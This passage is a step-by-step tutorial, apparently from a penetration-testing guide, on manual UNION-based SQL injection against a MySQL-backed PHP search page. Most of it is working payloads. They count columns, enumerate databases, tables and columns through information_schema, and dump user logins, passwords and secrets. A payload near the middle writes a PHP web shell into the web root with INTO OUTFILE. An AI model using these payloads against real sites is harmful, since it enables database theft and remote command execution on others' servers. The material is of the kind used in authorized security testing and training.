Let's say the search page is handled by a file named sql.php and the parameter is search:
sql.php?search=pentesting
The first thing we try is to break the query with a single quote:
sql.php?search='
If the page returns a database error, our input is probably reaching the query unsanitised. The error on its own is only an indicator (the application may hide errors, or the error may have another cause), so confirm by appending a condition that is always true and one that is always false to the same quoted input and checking that the two responses differ. Next we determine how many columns the original query returns, starting with a normal search so we know what a valid result page looks like. Finding the number of columns:
sql.php?search=test' ORDER BY 1-- -
OR
sql.php?search=' ORDER BY 1--
We keep incrementing the number until we hit an error: if ORDER BY N succeeds and ORDER BY N+1 errors, the query returns N columns. (We write the comment as -- - because MySQL requires whitespace after --, and a trailing space is easily lost in a URL.) Then we build a UNION with that many placeholders:
sql.php?search=pentesting' union select 1,1,1,1,1,1,1#
OR
sql.php?search=' and 1=0 union all select 1,1,1,1,1,1,1 from information_schema.tables where 1=0 or 1=1-- '
If the count is wrong, MySQL reports that the SELECT statements have a different number of columns; we adjust the number of 1s until the page renders without error, and the count of 1s is the column count. The and 1=0 in the second form makes the original WHERE clause false, so only the injected rows are displayed. Note which positions are actually rendered on the page, since only those slots can be used to read data. Then we find the database name and version, the table names, and the columns of the target table:
sql.php?search=pentesting' union select 1,database(),@@version,1,1,1,1#
OR
sql.php?search=' and 1=0 union all select 1,database(),@@version,1,1,1,1 from information_schema.tables where 1=0 or 1=1-- '
sql.php?search=pentesting' union select 1,table_name,1,1,1,1,1 from information_schema.tables#
OR
sql.php?search=' and 1=0 union all select 1,table_name,1,1,1,1,1 from information_schema.tables where 1=0 or 1=1-- '
(Unfiltered, this also lists MySQL's own system tables; restricting on the table_schema column to the current database keeps the output to the application's tables.)
sql.php?search=pentesting' union select 1,column_name,1,1,1,1,1 from information_schema.columns where table_name='users'#
OR
sql.php?search=' and 1=0 union all select 1,column_name,1,1,1,1,1 from information_schema.columns where table_name='users'-- '
With the column names known, we read the data itself:
sql.php?search=pentesting' union select 1,login,user,password,1,1,1 from users#
OR
sql.php?search=' and 1=0 union all select 1,login,password,secret,email,admin,7 from users-- -
If the database account has the FILE privilege, secure_file_priv does not forbid the target directory, and the MySQL server process can write to the web root, the same UNION can write a web shell to disk:
sql.php?search=pentesting' union select 1,"<?php echo shell_exec($_GET['cmd'])?>",1,1,1,1,1 into outfile "/var/www/html/shell3.php"#
OR
sql.php?search=' and 1=0 union all select 1,"<?php echo shell_exec($_GET['cmd'])?>",1,1,1,1,1 into outfile "/var/www/html/shell3.php"#
The file is written by the database server, not the web server, so the path must be the web root as seen from the MySQL host, and INTO OUTFILE refuses to overwrite a file that already exists.
Another method, once the number of columns is known. Say we found three columns; we would continue this way:
searchitem=test' UNION SELECT 1,2,3-- -
searchitem=test' UNION SELECT 1,(select group_concat(SCHEMA_NAME) from INFORMATION_SCHEMA.SCHEMATA),3-- -
The SCHEMATA table contains the names of the databases MySQL knows about; group_concat packs all of them into one string, so a single rendered column is enough to read every row.
Extracting the tables in a database
searchitem=test' UNION SELECT 1,(select group_concat(TABLE_NAME) from INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA = 'db'),3-- -
Extracting columns in a table
searchitem=test' UNION SELECT 1,(select group_concat(COLUMN_NAME) from INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'users'),3-- -
Extracting specific data from a column
searchitem=test' UNION SELECT 1,(select username from db.users limit 1),3-- -
A scalar subquery may return only one row, so without the limit this errors as soon as users holds more than one row; increase the offset in the limit clause to walk through the rows, or use group_concat as above to get them all at once.
OR
searchitem=test' UNION SELECT 1,concat(id,':',name,':',password),3 from users-- -
Another method of finding the number of columns and proceeding further
' UNION select 1 from information_schema.tables #
' UNION select 1,2 from information_schema.tables #
' UNION select 1,2,3 from information_schema.tables #
The one that renders without a column-count error indicates the number of columns. Proceeding:
' UNION select 1,table_schema,table_name from information_schema.tables #
' UNION select 1,table_name,column_name from information_schema.columns #